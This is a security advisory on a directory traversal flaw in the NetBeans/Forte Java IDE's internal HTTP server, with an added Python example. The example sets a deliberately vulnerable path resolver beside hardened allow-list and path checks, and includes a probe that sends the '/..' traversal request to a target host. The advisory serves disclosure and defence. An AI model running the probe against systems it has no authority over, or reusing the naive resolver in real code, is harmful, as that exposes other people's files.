
NetBeans/Forte Java IDE HTTP directory traversal vulnerability
Vulnerability

    NetBeans/Forte Java IDE internal HTTP server

Affected

    Sun Microsystems NetBeans (recently renamed Forte) Java IDE

Description

    Halcyon Skinner reported the following.  Versions tested: NetBeans
    Developer 3.0 Beta and Forte Community Edition 1.0 Beta; it is not
    known whether earlier versions are affected.

    The IDE includes an internal HTTP server for trying out Java code.
    Its settings suggest that access must be explicitly granted on a
    per-IP-address basis.  In practice, once the service is enabled for
    a single machine, the HTTP server allows any remote machine to
    retrieve the root directory and all of its subdirectories.

    NOTE: in NetBeans 3.0 Beta this is the default behaviour, so the
    vulnerability exists without any action by the user.  In Forte 1.0
    Beta the user must add at least one address in the HTTP server
    settings for the vulnerability to exist; however, once a single IP
    address has been entered, any machine can connect to the internal
    HTTP server port (default 8082).  Even after all IP addresses are
    removed, the server continues to accept connections for as long as
    the IDE is running.

    Example.  While the IDE is running, connecting with any browser to

        http://vvv.xxx.yyy.zzz:8082/..

    returns a listing of the root directory.  Subdirectories can then
    be browsed from that listing.
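    The following is an added example, not part of the original advisory
    and not NetBeans/Forte code.  It models the two defects described
    above in Python beside their hardened counterparts: an allow list
    that is enforced on every request and denies by default (so removing
    the last address really closes the server), and a path resolver that
    refuses any request resolving outside the document root, including
    the percent-encoded form of "..", which the advisory does not
    mention.  It also includes a probe that sends the advisory's request
    to a running IDE.  The document root, the sample addresses and the
    "<a href" listing heuristic are assumptions.

```python
"""Added example: allow-list enforcement, traversal-safe path mapping and a
probe for the IDE's internal HTTP server.  Not the advisory's or the IDE's
own code; paths, addresses and the listing heuristic are assumptions."""
import posixpath
import socket
from ipaddress import ip_address, ip_network
from urllib.parse import unquote

DEFAULT_PORT = 8082            # default internal HTTP server port per the advisory
DOCROOT = "/home/dev/project"  # assumed document root used in the examples


class AccessPolicy:
    """Per-request allow-list check.

    Deny by default: a disabled server or an empty allow list admits nobody,
    so removing the last entry takes effect at once instead of leaving the
    server open to any peer, which is the behaviour the advisory describes.
    """

    def __init__(self, enabled, allowed):
        self.enabled = enabled
        # Accept single addresses ("10.0.0.5") or CIDR ranges ("10.0.0.0/24").
        self.allowed = [ip_network(entry, strict=False) for entry in allowed]

    def permits(self, peer_ip):
        if not self.enabled or not self.allowed:
            return False
        peer = ip_address(peer_ip)
        return any(peer in net for net in self.allowed)


def vulnerable_resolve(docroot, url_path):
    """Naive mapping: join the request path onto the document root and
    normalise.  A request for '/..' walks out of the root, as in the advisory."""
    return posixpath.normpath(posixpath.join(docroot, url_path.lstrip("/")))


def resolve_under_root(docroot, url_path):
    """Hardened mapping: decode, drop the query string, normalise, then
    refuse any result that is neither the document root nor inside it.
    Returns the filesystem path to serve, or None to reject the request."""
    path = unquote(url_path.split("?", 1)[0])
    root = posixpath.normpath(docroot)
    candidate = posixpath.normpath(posixpath.join(root, path.lstrip("/")))
    if candidate == root or candidate.startswith(root.rstrip("/") + "/"):
        return candidate
    return None


def looks_like_listing(response):
    """Heuristic used by the probe: a 200 response whose body carries
    hyperlinks.  The advisory does not show the IDE's listing format, so
    the '<a href' marker is an assumption."""
    head, _, body = response.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].split()
    ok = len(parts) >= 2 and parts[0].startswith(b"HTTP/") and parts[1] == b"200"
    return ok and b"<a href" in body.lower()


def probe(host, port=DEFAULT_PORT, path="/..", timeout=5.0):
    """Send the advisory's request to a running IDE and report whether a
    directory listing came back.  Needs network access to the target."""
    request = "GET {} HTTP/1.0\r\nHost: {}\r\n\r\n".format(path, host).encode()
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return looks_like_listing(b"".join(chunks))


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    print("listing exposed" if probe(target) else "no listing returned")
```

    Run it as "python check.py <ide-host>" against a machine with the
    IDE open to see whether "/.." yields a listing; the resolver and
    policy classes show what the server should have done with that
    request and with a peer that is not on the list.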

Solution

    Workaround (both steps are recommended):

        1) Set the HTTP Server "Enable" setting to False in the Project
           settings.
        2) Remove the HTTP Server module in the Global settings.

    Vendor has been notified.
